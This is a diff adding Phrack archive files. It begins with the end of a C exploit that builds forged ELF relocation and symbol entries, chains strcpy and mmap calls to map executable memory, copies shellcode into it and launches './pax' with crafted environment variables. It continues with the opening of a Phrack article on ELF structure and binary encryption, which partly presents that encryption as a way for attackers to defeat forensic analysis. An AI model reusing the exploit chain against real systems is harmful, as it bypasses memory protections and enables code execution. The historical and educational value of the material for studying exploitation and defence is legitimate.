+                ptr[offset] = 0xff;
+                fix_zero(b, FRAMESINDATA + offset, zeronum);
+        } else
+                fix_zero(b, FRAMESINDATA + sizeof(struct ourbuf) + 4,
+                    zeronum);
+}
+
+/* same as above, but prepare to nullify a byte not in our payload, but at 
+absolute address abs */
+void setup_zero_abs(struct ourbuf *b, unsigned char *addr, int offset,
+    int zeronum)
+{
+        char *ptr = (char *) b;
+        if (!ptr[offset]) {
+                fprintf(stderr, "fixing abs zero at %i(off=%i)\n", zeronum,
+                    offset);
+                ptr[offset] = 0xff;
+                fix_zero(b, (unsigned int) addr, zeronum);
+        } else
+                fix_zero(b, FRAMESINDATA + sizeof(struct ourbuf) + 4,
+                    zeronum);
+}
+
+int main(int argc, char **argv)
+{
+        char lng[sizeof(struct ov) + 4 + 1];
+        char str[sizeof(struct ourbuf) + 4 + 1];
+        char *env[3] = { lng, str, 0 };
+        struct ourbuf thebuf;
+        struct ov theov;
+        int i;
+        unsigned int real_index, mysym, reloc_offset;
+
+        memset(theov.scratch, 'X', sizeof(theov.scratch));
+        if (argc == 2 && !strcmp("testing", argv[1])) {
+                for (i = 0; i < sizeof(theov.scratch); i++)
+                        theov.scratch[i] = i + 0x10;
+                theov.ebp = 0x01020304;
+                theov.eip = 0x05060708;
+        } else {
+                theov.ebp = FRAMESINDATA;
+                theov.eip = LEAVERET;
+        }
+        strcpy(lng, "LNG=");
+        memcpy(lng + 4, &theov, sizeof(theov));
+        lng[4 + sizeof(theov)] = 0;
+
+        memset(&thebuf, 'A', sizeof(thebuf));
+        real_index = (VIND - VERSYM) / 2;
+        mysym = SYMTAB + 16 * real_index;
+        fprintf(stderr, "mysym=0x%x\n", mysym);
+        if (mysym > FRAMESINDATA
+            && mysym < FRAMESINDATA + sizeof(struct ourbuf) + 16) {
+                fprintf(stderr,
+                    "syment intersects our payload;"
+                    " choose another VIND or FRAMESINDATA\n");
+                exit(1);
+        }
+
+        reloc_offset = FRAMESINDATA + offsetof(struct ourbuf, r) - JMPREL;
+
+/* This strcpy call will relocate my_elf_sym from our payload to a fixed, 
+appropriate location (mysym)
+*/
+        thebuf.reloc.new_ebp =
+            FRAMESINDATA + offsetof(struct ourbuf, zero);
+        thebuf.reloc.func = STRCPY;
+        thebuf.reloc.leave_ret = LEAVERET;
+        thebuf.reloc.param1 = mysym;
+        thebuf.reloc.param2 = FRAMESINDATA + offsetof(struct ourbuf, sym);
+
+
+
+
+        thebuf.mymmap.new_ebp =
+            FRAMESINDATA + offsetof(struct ourbuf, trans);
+        thebuf.mymmap.put_plt_here = PLT;
+        thebuf.mymmap.reloc_offset = reloc_offset;
+        thebuf.mymmap.leave_ret = LEAVERET;
+        thebuf.mymmap.start = MMAP_START;
+        thebuf.mymmap.length = 0x01020304;
+        thebuf.mymmap.prot =
+            0x01010100 | PROT_EXEC | PROT_READ | PROT_WRITE;
+        thebuf.mymmap.flags =
+            0x01010000 | MAP_EXECUTABLE | MAP_FIXED | MAP_PRIVATE |
+            MAP_ANONYMOUS;
+        thebuf.mymmap.fd = 0xffffffff;
+        thebuf.mymmap.offset = 0x01021000;
+
+        thebuf.trans.new_ebp = 0x01020304;
+        thebuf.trans.func = STRCPY;
+        thebuf.trans.leave_ret = MMAP_START + 1;
+        thebuf.trans.param1 = MMAP_START + 1;
+        thebuf.trans.param2 = FRAMESINDATA + offsetof(struct ourbuf, hell);
+
+        memset(thebuf.hell, 'x', sizeof(thebuf.hell));
+        memcpy(thebuf.hell, hellcode, strlen(hellcode));
+
+        thebuf.r.r_info = 7 + 256 * real_index;
+        thebuf.r.r_offset = FRAMESINDATA + sizeof(thebuf) + 4;
+        thebuf.sym.st_name =
+            FRAMESINDATA + offsetof(struct ourbuf, mmapname) 
+            + NAME_ADD_OFF- STRTAB;
+
+        thebuf.sym.st_value = FRAMESINDATA + sizeof(thebuf) + 4;
+#define ANYTHING 0xfefefe80
+        thebuf.sym.st_size = ANYTHING;
+        thebuf.sym.st_info = (unsigned char) ANYTHING;
+        thebuf.sym.st_other = ((unsigned char) ANYTHING) & ~3;
+        thebuf.sym.st_shndx = (unsigned short) ANYTHING;
+
+        strcpy(thebuf.mmapname, mmap_string);
+
+/* setup_zero[_abs] functions prepare arguments for strcpy calls, which
+are to nullify certain bytes
+*/
+        setup_zero(&thebuf,
+            offsetof(struct ourbuf, r) + 
+            offsetof(struct my_elf_rel, r_info) + 2, 0);
+
+        setup_zero(&thebuf,
+            offsetof(struct ourbuf, r) + 
+            offsetof(struct my_elf_rel, r_info) + 3, 1);
+
+        setup_zero_abs(&thebuf,
+            (char *) mysym + offsetof(struct my_elf_sym, st_name) + 2,
+                    offsetof(struct ourbuf, sym) + 
+                offsetof(struct my_elf_sym, st_name) + 2, 2);
+
+        setup_zero_abs(&thebuf,
+            (char *) mysym + offsetof(struct my_elf_sym, st_name) + 3,
+                    offsetof(struct ourbuf, sym) + 
+                offsetof(struct my_elf_sym, st_name) + 3, 3);
+
+        setup_zero(&thebuf,
+            offsetof(struct ourbuf, mymmap) + 
+            offsetof(struct mmap_plt_args, start), 4);
+
+        setup_zero(&thebuf,
+            offsetof(struct ourbuf, mymmap) + 
+            offsetof(struct mmap_plt_args, offset), 5);
+
+        setup_zero(&thebuf,
+            offsetof(struct ourbuf, mymmap) + 
+            offsetof(struct mmap_plt_args, reloc_offset) + 2, 6);
+
+        setup_zero(&thebuf,
+            offsetof(struct ourbuf, mymmap) + 
+            offsetof(struct mmap_plt_args, reloc_offset) + 3, 7);
+
+        strcpy(str, "STR=");
+        memcpy(str + 4, &thebuf, sizeof(thebuf));
+        str[4 + sizeof(thebuf)] = 0;
+        if (sizeof(struct ourbuf) + 4 >
+            strlen(str) + sizeof(thebuf.mmapname)) {
+                fprintf(stderr,
+                    "Zeroes in the payload, sizeof=%d, len=%d, correct it !\n",
+                    sizeof(struct ourbuf) + 4, strlen(str));
+                fprintf(stderr, "sizeof thebuf.mmapname=%d\n",
+                    sizeof(thebuf.mmapname));
+                exit(1);
+        }
+        execle("./pax", "pax", 0, env, 0);
+        return 1;
+}
+<-->
diff --git a/phrack58/5.txt b/phrack58/5.txt
new file mode 100644
index 0000000..90fb29f
--- /dev/null
+++ b/phrack58/5.txt
@@ -0,0 +1,1803 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x3a, Phile #0x05 of 0x0e
+
+|=----=[ Armouring the ELF: Binary encryption on the UNIX platform ]=----=|
+|=-----------------------------------------------------------------------=|
+|=-------=[ grugq <grugq@lokmail.net>, scut <scut@team-teso.net> ]=------=|
+
+
+--[ Contents
+
+  - Introduction
+  - Why encrypt?
+  - What is binary encryption?
+  - The threat
+  - ELF format
+    - ELF headers
+    - ELF sections
+    - ELF segments
+    - ELF support and history
+  - ELF loading
+    - ELF loading - Linux
+    - ELF Linux - auxiliary vectors
+    - ELF mapping
+  - Binary encryption theory
+  - Runtime decryption techniques
+  - ELF parasite approach
+  - Packing/Userspace ELF loader
+  - The future
+  - References
+
+
+--[ Introduction
+
+The UNIX world has lagged far behind the Microsoft world (including both
+MS-DOS and MS Windows) in the twin realms of binary protection and reverse
+engineering.
+
+The variety and types of binary protection are a major area of difference.
+MS Windows PE binaries can be encrypted, packed, wrapped, and thoroughly
+obfuscated, and then decrypted, unpacked, unwrapped, and reconstructed.
+Conversely, the best that can be done to a UNIX ELF binary is stripping the
+debugging symbol table. There are no deconstructors, no wrappers, no
+encrypters, and only a single packer (UPX [12], aimed at decreasing disk
+space, not increasing protection) for the ELF. Clearly the UNIX ELF binary
+is naked compared to the powerful protections afforded the Windows PE binary
+format.
+
+The quantity and quality of reverse engineering tools are other key areas
+of significant gulf. The runtime environment of the PE binary, and indeed
+the very operating system it executes on, is at the mercy of the brilliant
+debugger SoftICE. Meanwhile the running ELF can only be examined one word
+at a time via the crippled system call ptrace(), imperfectly interfaced via
+adb and its brain dead cousin: gdb. The procfs, on those systems on which
+it is present, typically only provides the ability to examine a process
+rather than control it. Indeed, the UNIX world is an unrealised nightmare
+for the UNIX reverse engineer. Unrealised because up until now no one has
+bothered to protect an ELF binary.
+
+
+--[ Why encrypt?
+
+The prime motivator for protecting files on MS platforms has been to enforce
+copy protection in a failed attempt to ensure payment for shareware
+applications. As of now, there is no such motivation on the UNIX side, but
+there are other reasons to protect binaries.
+
+From the viewpoint of an attacker the reasons to protect binaries can be
+listed as:
+
+        - hindering forensic analysis in case of detection
+        - hindering copying of confidential data (possibly by other
+          attackers or commercially motivated forensic investigators*)
+        - adding functionality to the protected binary
+
+From the point of view of a defender, there are also good reasons to
+protect binaries. These can be enumerated as
+
+        - adding a level of authorization checks
+        - hindering analysis of customised intrusion detection tools (tools
+          that an attacker might figure out how to evade, were they to
+          discover their purpose)
+        - adding functionality to the protected binary
+
+The need to protect binaries from analysis in the UNIX world has clearly
+surfaced.
+
+* Certain big five companies sell their collections of recovered exploits
+  for an annual fee.
+
+
+--[ What is binary encryption?
+
+The reasons to protect a binary are clear, now we have to come up with a
+good design for the protection itself.  When we talk of protecting binaries
+it is important to know what sort of protection we expect to achieve; we
+must define our requirements. The requirements for this implementation are
+as follows:
+
+        - Only authorised individuals may execute the binary.
+        - The on disk binary must be immune for all methods of static
+          analysis which might reveal anything substantial about the
+          purposes/methods of the binary.
+        - The process image of the binary, something that unfortunately
+          cannot be hidden, must obscure the purposes/methods of the
+          binary.
+        - The mechanism for protecting the binary must be production
+          quality, being both robust and reliable.
+
+The best mechanism to fulfill all of these requirements is with some form of
+encryption. We know enough of what we want that we can now define the term
+"binary encryption" as the process of protecting a binary from reverse
+engineering and analysis, while keeping it intact and executeable to the
+underlying operating system. Thus, when we talk of binary encryption we refer
+to a robust security mechanism for protecting binaries.
+
+
+--[ The threat
+
+Today most of the so called "forensic analysts" have very few tools and
+knowledge at hand to counter anything more sophisticated than rm, strip and 
+some uncautious attacker. This has been demostrated in the public analysis of
+the x2 binary [14]. Two seminal forensic investigators have been completely
+stumped by a relatively simple binary protection. It is worth mentioning
+that two private reverse engineers reversed the x2 binary to C source code
+in approximately one day.
+
+The Unix forensic investigater has an extremely limited range of tools at
+her disposal for analysis of a compromised machine. These tools tend to
+be targeted at debugging a misbehaving system, rather than analysing a
+compromised system. While locate, find, lsof and netstat are fine when
+attempting to keep a production system from falling over, when it comes to
+investigating a breakin, they fall short on usefulness. Even TCT is severly
+limited in its capabilities (although that is the subject of another
+paper).
+
+If the broad analysis of an entire system is so impaired, binary analysis
+is even more so. The forensic analyst is equiped with tools designed to
+debug binaries straight from the back end of an accomidating compiler, not
+the hostile binaries packaged by a crafty attacker. The list of tools is
+short, but for completeness presented here: strings, objdump, readelf,
+ltrace, strace, and gdb. These tools are all based on two flawed interfaces:
+libbfd and ptrace(). There are superior tools currently in development, but
+they are primarily intended for, and used by, Unix reverse engineers and
+other individuals with "alternative" motivations.
+
+Barring these private reverse engineering applications, no Unix tools exist
+to tackle sophisticated hostile code. This is because the basic Unix
+debugging hooks are very limited. The ubiquitus ptrace() can be easily
+subverted and confused, and while /proc interface is more feature rich, it is
+not uniform across platforms. Additionally the /proc debugging interface 
+typically provides only information about the runtime environment of a
+process, not control over its exectuion. Even the most sophisticated procfs
+need not be of any help to the analyst, if the binary is sufficiently
+protected.  
+
+That said, there has been some slight improvement in the quality of analysis
+tools. The powerful Windows only disassembler - IDA - now provides complete
+support for the ELF binary format. Indeed, with the latest release IDA can
+finally handle ELF binaries without a section header table (thanks Ilfak).
+
+These improvements in the available tools are meaningless however, unless
+there is an accompanying increase in knowledge and skill for the forensic
+analysers.  Given that there are almost no skilled reverse engineers in
+forensic analysis (based on the published material one could easily conclude
+that there are none), the hackers will have the upper hand at the start of
+this arms race.
+
+As the underground world struggles with with the issue of leaking exploits
+and full vs. non disclusure, more hackers will see binary encryption as a
+means of securing their intellectual property. Simultaneously the security
+community is going to be exposed to more encrypted binaries, and will have
+to learn to analyse a hostile binary.
+
+
+--[ ELF format
+
+The 'Executeable and Linking Format' is a standardized file format for
+executeable code. It is mostly used for executeable files (ET_EXEC) or for
+shared libraries (ET_DYN). Currently almost all modern Unix variants
+support the ELF format for its portability, standardized features and
+designed-from-scratch cleaness. The actual version of the ELF standard is
+1.2. There are multiple documents covering the standard, see [1].
+
+The ELF binary format was designed to meet the requirements of both linkers
+(typically used during compile time) and loaders (typically used only
+during run time). This nessicitated the incorporation of two distinct
+interfaces to describe the data contained within the binary file. These two
+interfaces have no dependancy on each other. This section will act as a
+brief introduction to both interfaces of the ELF.
+
+
+--[ ELF headers
+
+An ELF file must contain at a minimum an ELF header. The ELF header
+contains information regarding how the contents of the binary file should
+be interpreted, as well as the locations of the other structures describing
+the binary. The ELF header starts at offset 0 within the file, and has the
+following format:
+
+#define EI_NIDENT (16)
+
+typedef struct
+{
+  unsigned char e_ident[EI_NIDENT];     /* Magic number and other info */
+  Elf32_Half    e_type;                 /* Object file type */
+  Elf32_Half    e_machine;              /* Architecture */
+  Elf32_Word    e_version;              /* Object file version */
+  Elf32_Addr    e_entry;                /* Entry point virtual address */
+  Elf32_Off     e_phoff;                /* Program header table file offset */
+  Elf32_Off     e_shoff;                /* Section header table file offset */
+  Elf32_Word    e_flags;                /* Processor-specific flags */
+  Elf32_Half    e_ehsize;               /* ELF header size in bytes */
+  Elf32_Half    e_phentsize;            /* Program header table entry size */
+  Elf32_Half    e_phnum;                /* Program header table entry count */
+  Elf32_Half    e_shentsize;            /* Section header table entry size */
+  Elf32_Half    e_shnum;                /* Section header table entry count */
+  Elf32_Half    e_shstrndx;             /* Section header string table index */
+} Elf32_Ehdr;
+
+The fields are explained in detail below:
+
+    * e_ident has certain known offsets that contain information about how to
+      treat and interpret the binary. Be warned that Linux defines additional
+      indices and values that are not contained in the SysV ABI, and are
+      therefore non-portable. These are the official known offsets, and their
+      potential values:
+
+#define EI_MAG0         0               /* File identification byte 0 index */
+#define ELFMAG0         0x7f            /* Magic number byte 0 */
+
+#define EI_MAG1         1               /* File identification byte 1 index */
+#define ELFMAG1         'E'             /* Magic number byte 1 */
+
+#define EI_MAG2         2               /* File identification byte 2 index */
+#define ELFMAG2         'L'             /* Magic number byte 2 */
+
+#define EI_MAG3         3               /* File identification byte 3 index */
+#define ELFMAG3         'F'             /* Magic number byte 3 */
+
+#define EI_CLASS        4               /* File class byte index */
+#define ELFCLASSNONE    0               /* Invalid class */
+#define ELFCLASS32      1               /* 32-bit objects */
+#define ELFCLASS64      2               /* 64-bit objects */
+
+#define EI_DATA         5               /* Data encoding byte index */
+#define ELFDATANONE     0               /* Invalid data encoding */
+#define ELFDATA2LSB     1               /* 2's complement, little endian */
+#define ELFDATA2MSB     2               /* 2's complement, big endian */
+
+#define EI_VERSION      6               /* File version byte index */
+#define EV_CURRENT      1               /* Value must be EV_CURRENT */
+
+
+    * e_type describes how the binary is intended to be utilised. The following
+      are legal values:
+
+#define ET_NONE         0               /* No file type */
+#define ET_REL          1               /* Relocatable file */
+#define ET_EXEC         2               /* Executable file */
+#define ET_DYN          3               /* Shared object file */
+#define ET_CORE         4               /* Core file */
+
+    * e_machine indicates for which architecture the object file is
+      intended. The following is a short list of the most common values:
+
+#define EM_SPARC         2              /* SUN SPARC */
+#define EM_386           3              /* Intel 80386 */
+#define EM_SPARCV9      43              /* SPARC v9 64-bit */
+#define EM_IA_64        50              /* Intel Merced */
+
+    * e_version indicates which version of ELF the object file conforms too.
+      Currently it must be set to EV_CURRENT, identical to
+      e_ident[EI_VERSION].
+
+    * e_entry contains the relative virtual address of the entry point to the
+      binary. This is traditionally the function _start() which is located at
+      the start of the .text section (see below). This field only has meaning
+      for ET_EXEC objects.
+
+    * e_phoff conatins the offset from the start of the file to the first
+      Program Header (see below). This field is only meaningful in ET_EXEC and
+      ET_DYN objects.
+
+    * e_shoff contains the offset from the start of the file to the first
+      Section Header (see below). This field is always useful to the reverse
+      engineer, but only required on ET_REL files.
+
+    * e_flags contains processor specific flags. This field is not used on
+      i386 or SPARC systems, so it can be safely ignored.
+
+    * e_ehsize contains the size of the ELF header. This is for error checking
+      and should be set to sizeof(Elf32_Ehdr).
+
+    * e_phentsize contains the size of a Program Header. This is for error
+      checking and should be set to sizeof(Elf32_Phdr).
+
+    * e_phnum contains the number of Program headers. The program header table
+      is an array of Elf32_Phdr with e_phnum elements.
+
+    * e_shentsize contains the size of a Section Header. This is for error
+      checking and should be set to sizeof(Elf32_Shdr).
+
+    * e_shnum contains the number of Section headers. The section header table
+      is an array of Elf32_Shdr with e_shnum elements.
+
+    * e_shstrndx contains the index within the section header table of the
+      section containing the string table of section names (see below).
+
+
+The following two sections describe in detail the linking interface and the
+execution interface to the ELF, respectively.
+
+
+--[ ELF Sections
+
+The interface used when linking multiple object files together is the Section
+interface. The binary file is viewed as an collection of sections; each an
+array of bytes of which no byte may reside in more than one secion. The
+contents of a section may be interpreted in any way by the inspecting
+application, although there is helper information to enable an application
+to correctly interpret a section's contents. Each section is described by a
+section header, contained within a section header table typically located
+at the end of the object. The section header table is an array of section
+headers in arbitrary order, although usually in the same order as they
+appear in the file, with the only exeption being that the zeroeth entry is
+the NULL section: a section which is set to 0 and doesn't describe any part
+of the binary. Each section header has the following format:
+
+typedef struct
+{
+  Elf32_Word    sh_name;                /* Section name (string tbl index) */
+  Elf32_Word    sh_type;                /* Section type */
+  Elf32_Word    sh_flags;               /* Section flags */
+  Elf32_Addr    sh_addr;                /* Section virtual addr at execution */
+  Elf32_Off     sh_offset;              /* Section file offset */
+  Elf32_Word    sh_size;                /* Section size in bytes */
+  Elf32_Word    sh_link;                /* Link to another section */
+  Elf32_Word    sh_info;                /* Additional section information */
+  Elf32_Word    sh_addralign;           /* Section alignment */
+  Elf32_Word    sh_entsize;             /* Entry size if section holds table */
+} Elf32_Shdr;
+
+The fields of the section header have the following meanings:
+
+    * sh_name contains an index into the section contents of the e_shstrndx
+      string table. This index is the start of a null terminated string to
+      be used as the name of the section. There are reserved names, the
+      most important being:
+		.text		Executable object code
+		.rodata		Read only strings
+		.data		Initialised "static" data
+		.bss		Zero initialized "static" data, and the
+				base of the heap
+
+    * sh_type contains the section type, helping the inspecting application
+      to determine how to interpret the sections contents. The following
+      are legal values:
+
+#define SHT_NULL         0              /* Section header table entry unused */
+#define SHT_PROGBITS     1              /* Program data */
+#define SHT_SYMTAB       2              /* Symbol table */
+#define SHT_STRTAB       3              /* String table */
+#define SHT_RELA         4              /* Relocation entries with addends */
+#define SHT_HASH         5              /* Symbol hash table */
+#define SHT_DYNAMIC      6              /* Dynamic linking information */
+#define SHT_NOTE         7              /* Notes */
+#define SHT_NOBITS       8              /* Program space with no data (bss) */
+#define SHT_REL          9              /* Relocation entries, no addends */
+#define SHT_SHLIB        10             /* Reserved */
+#define SHT_DYNSYM       11             /* Dynamic linker symbol table */
+
+
+    * sh_flags contains a bitmap defining how the contents of the section
+      are to be treated at run time. Any bitwise OR'd value of the
+      following is legal:
+
+#define SHF_WRITE       (1 << 0)        /* Writable */
+#define SHF_ALLOC       (1 << 1)        /* Occupies memory during execution */
+#define SHF_EXECINSTR   (1 << 2)        /* Executable */
+
+
+    * sh_addr contains the relative virtual address of the section during
+      runtime.
+
+    * sh_offset contains the offset from the start of the file to the first
+      byte of the section.
+
+    * sh_size contains the size in bytes of the section.
+
+    * sh_link is used to link associated sections together. This is
+      typically used to link a string table to a section whose contents
+      require a string table for correct intepretation, e.g. symbol tables.
+
+    * sh_info is a used to contain extra information to aid in link
+      editing. This field has exactly two uses, indicating which section a
+      relocation applies to for SHT_REL[A] sections, and holding the
+      maximum number of elements plus one within a symbol table.
+
+    * sh_addralign contains the alignment requirement of section contents,
+      typically 0/1 (both meaning no alignment) or 4.
+
+    * sh_entsize, if the section holds a table, contains the size of each
+      element. Used for error checking.
+
+
+--[ ELF Segments
+
+The ELF segment interface is used to during the creation of a process
+image. Each segment, a contiguous stream of bytes, (not to be confused with
+a memory segment, i.e. one page) is described by a program header. The
+program headers are contained in a program header table described by the
+ELF header. This table can be located anywhere, but is typically located
+immediately after the ELF header *. The program header is now described in
+depth:
+
+typedef struct
+{
+  Elf32_Word	p_type;			/* Segment type */
+  Elf32_Off	p_offset;		/* Segment file offset */
+  Elf32_Addr	p_vaddr;		/* Segment virtual address */
+  Elf32_Addr	p_paddr;		/* Segment physical address */
+  Elf32_Word	p_filesz;		/* Segment size in file */
+  Elf32_Word	p_memsz;		/* Segment size in memory */
+  Elf32_Word	p_flags;		/* Segment flags */
+  Elf32_Word	p_align;		/* Segment alignment */
+} Elf32_Phdr;
+
+The fields have the following meanings:
+
+    * p_type describes how to treat the contents of a segment. The
+      following are legal values:
+
+#define PT_NULL         0               /* Program header table entry unused */
+#define PT_LOAD         1               /* Loadable program segment */
+#define PT_DYNAMIC      2               /* Dynamic linking information */
+#define PT_INTERP       3               /* Program interpreter */
+#define PT_NOTE         4               /* Auxiliary information */
+#define PT_SHLIB        5               /* Reserved */
+#define PT_PHDR         6               /* Entry for header table itself */
+
+    * p_offset contains the offset within the file of the first byte of the
+      segment.
+
+    * p_vaddr contains the realtive virtual address the segment expects to
+      be loaded into memory at.
+
+    * p_paddr contains the physical address of the segment expects to be
+      loaded into memory at. This field has no meaning unless the hardware
+      supports and requires this information. Typically this field is set to
+      either 0 or the same value as p_vaddr.
+
+    * p_filesz contains the size in bytes of the segment within the file.
+
+    * p_memsz contains the size in bytes of the segment once loaded into
+      memory. If the segment has a larger p_memsz than p_filesz, the
+      remaining space is initialised to 0. This is the mechanism used to
+      create the .bss during program loading.
+
+    * p_flags contains the memory protection flags for the segment once
+      loaded. Any bit wise OR'd combination of following are legal values:
+
+#define PF_X            (1 << 0)        /* Segment is executable */
+#define PF_W            (1 << 1)        /* Segment is writable */
+#define PF_R            (1 << 2)        /* Segment is readable */
+
+    * p_align contains the alignment for the segment in memory. If the
+      segment is of type PT_LOAD, then the alignment will be the expected
+      page size.
+
+* FreeBSD's dynamic linker requires the program header table to be located 
+within the first page (4096 bytes) of the binary.
+
+
+--[ ELF format - support and history
+
+The ELF format has widely gained acceptance as a reliable and mature
+executeable format. It is flexible, being able to support different
+architectures, 32 and 64 bit alike, without compromising too much of its
+design.
+
+As of now, the following systems support the ELF format:
+
+        DGUX             | ELF, ?, ?
+        FreeBSD          | ELF, 32/64 bit, little/big endian
+        IRIX             | ELF, 64 bit, big endian
+        Linux            | ELF, 32/64 bit, little/big endian
+        NetBSD           | ELF, 32/64 bit, little/big endian
+        Solaris          | ELF, 32/64 bit, little/big endian
+        UnixWare         | ELF, 32 bit, little endian
+
+The 32/64 bit differences on a single system is due to different
+architectures the operating systems is able to run on.
+
+
+--[ ELF loading
+
+An ELF binary is loaded by mapping all PT_LOAD segments into memory at the
+correct locations (p_vaddr), the binary is checked for library dependancies
+and if they exist those libraries are loaded. Finally, any relocations that
+need to be done are performed, and control is transfered to the main
+executable's entry point. The accompanying code in load.c demonstrates one
+method of doing this (based on the GNU dynamic linker).
+
+
+--[ ELF loading - Linux
+
+Once the userspace receives control, we have this situation:
+
+        - All PT_LOAD segments of the binary, or if its dynamicly linked:
+          the dynamic linker, are mapped properly
+        - Entry point: In case there is a PT_INTERP segment, the program
+          counter is set to the entry point of the program interpreter.
+        - Entry point: In case there is no PT_INTERP segment, the program
+          counter is initialized to the ELF header's entry point.
+        - The top of the stack is initialized with important data, see
+          below.
+
+When the userspace receives control, the stack layout has a fixed format.
+The rough order is this:
+
+       <arguments> <environ> <auxv> <string data>
+
+The detailed layout, assuming IA32 architecture, is this (Linux kernel
+series 2.2/2.4):
+
+  position            content                     size (bytes) + comment
+  ------------------------------------------------------------------------
+  stack pointer ->  [ argc = number of args ]     4
+                    [ argv[0] (pointer) ]         4   (program name)
+                    [ argv[1] (pointer) ]         4
+                    [ argv[..] (pointer) ]        4 * x
+                    [ argv[n - 1] (pointer) ]     4
+                    [ argv[n] (pointer) ]         4   (= NULL)
+
+                    [ envp[0] (pointer) ]         4
+                    [ envp[1] (pointer) ]         4
+                    [ envp[..] (pointer) ]        4
+                    [ envp[term] (pointer) ]      4   (= NULL)
+
+                    [ auxv[0] (Elf32_auxv_t) ]    8
+                    [ auxv[1] (Elf32_auxv_t) ]    8
+                    [ auxv[..] (Elf32_auxv_t) ]   8
+                    [ auxv[term] (Elf32_auxv_t) ] 8   (= AT_NULL vector)
+
+                    [ padding ]                   0 - 16
+
+                    [ argument ASCIIZ strings ]   >= 0
+                    [ environment ASCIIZ str. ]   >= 0
+
+  (0xbffffffc)      [ end marker ]                4   (= NULL)
+
+  (0xc0000000)      < top of stack >              0   (virtual)
+  ------------------------------------------------------------------------
+
+When the runtime linker (rtld) has done its duty of mapping and resolving
+all the required libraries and symbols, it does some initialization work
+and hands over the control to the real program entry point afterwards. As
+this happens, the conditions are:
+
+        - All required libraries mapped from 0x40000000 on
+        - All CPU registers set to zero, except the stack pointer ($sp) and
+          the program counter ($eip/$ip or $pc). The ABI may specify
+          further initial values, the i386 ABI requires that %edx is set to
+          the address of the DT_FINI function.
+
+
+--[ ELF loading - auxiliary vectors (Elf32_auxv_t).
+
+The stack initialization is somewhat familar for a C programmer, since he
+knows the argc, argv and environment pointers from the parameters of his
+'main' function. It gets called by the C compiler support code with exactly
+this parameters:
+
+    main (argc, &argv[0], &envp[0]);
+
+However, what is more of a mystery, and usually not discussed at all, is
+the array of 'Elf32_auxv_t' vectors. The structure is defined in the elf.h
+include file:
+
+typedef struct
+{
+        int a_type;                     /* Entry type */
+        union
+        {
+                long int a_val;         /* Integer value */
+                void *a_ptr;            /* Pointer value */
+                void (*a_fcn) (void);   /* Function pointer value */
+        } a_un;
+} Elf32_auxv_t;
+
+It is a generic type-to-value relationship structure used to transfer very
+important data from kernelspace to userspace. The array is initialized on
+any successful execution, but normally it is used only by the program
+interpreter. Lets take a look on the 'a_type' values, which define what
+kind of data the structure contains. The types are found in the 'elf.h'
+file, and although each architecture implementing the ELF standard is
+free to define them, there are a lot of similarities among them. The
+following list is from a Linux 2.4 kernel.
+
+/* Legal values for a_type (entry type).  */
+#define AT_NULL         0               /* End of vector */
+#define AT_IGNORE       1               /* Entry should be ignored */
+#define AT_EXECFD       2               /* File descriptor of program */
+#define AT_PHDR         3               /* Program headers for program */
+#define AT_PHENT        4               /* Size of program header entry */
+#define AT_PHNUM        5               /* Number of program headers */
+#define AT_PAGESZ       6               /* System page size */
+#define AT_BASE         7               /* Base address of interpreter */
+#define AT_FLAGS        8               /* Flags */
+#define AT_ENTRY        9               /* Entry point of program */
+#define AT_NOTELF       10              /* Program is not ELF */
+#define AT_UID          11              /* Real uid */
+#define AT_EUID         12              /* Effective uid */
+#define AT_GID          13              /* Real gid */
+#define AT_EGID         14              /* Effective gid */
+#define AT_CLKTCK       17              /* Frequency of times() */
+
+Some types are mandatory for the runtime dynamic linker, while some are
+merely candy and remain unused. Also, the kernel does not have to use every
+type, infact, the order and occurance of the elements are subject to change
+across different kernel versions. This turns out to be important when
+writing our own userspace ELF loader, since the runtime dynamic linker may
+expect a certain format, or even worse, the headers we receive by the
+kernel ourselves are in different order on different systems (Linux 2.2 to
+2.4 changed behaviour, for example). Anyway, if we stick to a few simple
+rules when parsing and setting up the headers, few things can go wrong:
+
+        - Always skip sizeof(Elf32_auxv_t) bytes at a time
+        - Skip any unknown AT_* type
+        - Ignore AT_IGNORE types
+        - Stop processing only at AT_NULL vector
+
+On Linux, the runtime linker requires the following Elf32_auxv_t
+structures:
+
+        AT_PHDR, a pointer to the program headers of the executeable
+        AT_PHENT, set to 'e_phentsize' element of the ELF header (constant)
+        AT_PHNUM, number of program headers, 'e_phnum' from ELF header
+        AT_PAGESZ, set to constant 'PAGE_SIZE' (4096 on x86)
+        AT_ENTRY, real entry point of the executeable (from ELF header)
+
+On other architectures there are similar requirements for very important
+auxiliary vectors, with which the runtime linker would not be able to work.
+
+Some further details about the way Linux starts up an executeable can be
+found at [11].
+
+
+--[ Binary encryption theory
+
+There is nothing new about encrypting binaries, indeed since the 1980's
+there have been various mechanisms developed for protecting binaries on
+personal computers. The most active developers of binary protections have
+been virus writers and shareware developers. While these techniques have
+evolved with advances in processing power and operating system architecture,
+most of the basic concepts remain the same. Essentially a plaintext
+decryption engine will execute first and it will decrypt the next encrypted
+section of code, this might be the main .text, or it might be another
+decryption engine.
+
+Barring a flawed and easily cracked encryption technique (e.g. XOR with a
+fixed value), the first plaintext decryptor is the usually the weak point of
+any encrypted binary. Due to this weakness, a number of various methods have
+been developed for making the initial decryption engine as difficult to
+reverse engineer as possible.
+
+The following is just a brief list of methods that have been used to
+protect the initial decryption engine:
+
+    * Self Modifying Code: Code which alters itself during run time, so that
+      analysis of the binary file on disk is different from analysis of the
+      memory image.
+
+    * Polymorphic Engines: Creates a unique decryption engine each time it is
+      used so that it is more difficult to compare two files. Also, it is
+      slightly more difficult to reverse engineer.
+
+    * Anti-Disassembling/Debugging tricks: Tricks which attempt to confuse
+      the tools being used by the reverse engineer. This makes it difficult
+      for the analyst to discover what the object code is doing.
+
+
+The following is a short list of encryption methods that have been used to
+protect the main object code of the executable:
+
+    * XOR: The favourite of any aspiring hacker, xor is frequently used to
+      obfuscate code with a simple encryption. These are usually very easily
+      broken, but extend slightly the time it takes to reverse engineer.
+
+    * Stream Ciphers: Ideal for binary encryption, these are usually strong,
+      small and can decrypt an arbitray number of bytes. A binary properly
+      encrypted with a stream cipher is impregnable to analysis.
+
+    * Block Ciphers: These are more awkward to use for binary encryption
+      because of the block alignment requirements.
+
+    * Virtual CPUs: A painstaking and powerful method of securing a binary.
+      The object code actually runs on a virual CPU that needs to be
+      independantly analysed first. Very painful for a reverse engineer (and
+      also the developer).
+
+There are even mechanisms to keep the plaintext as safe as possible in
+memory. Here is a partial list of some of these mechanisms:
+
+   * Running Line Code: This is when only the code immediately needed is
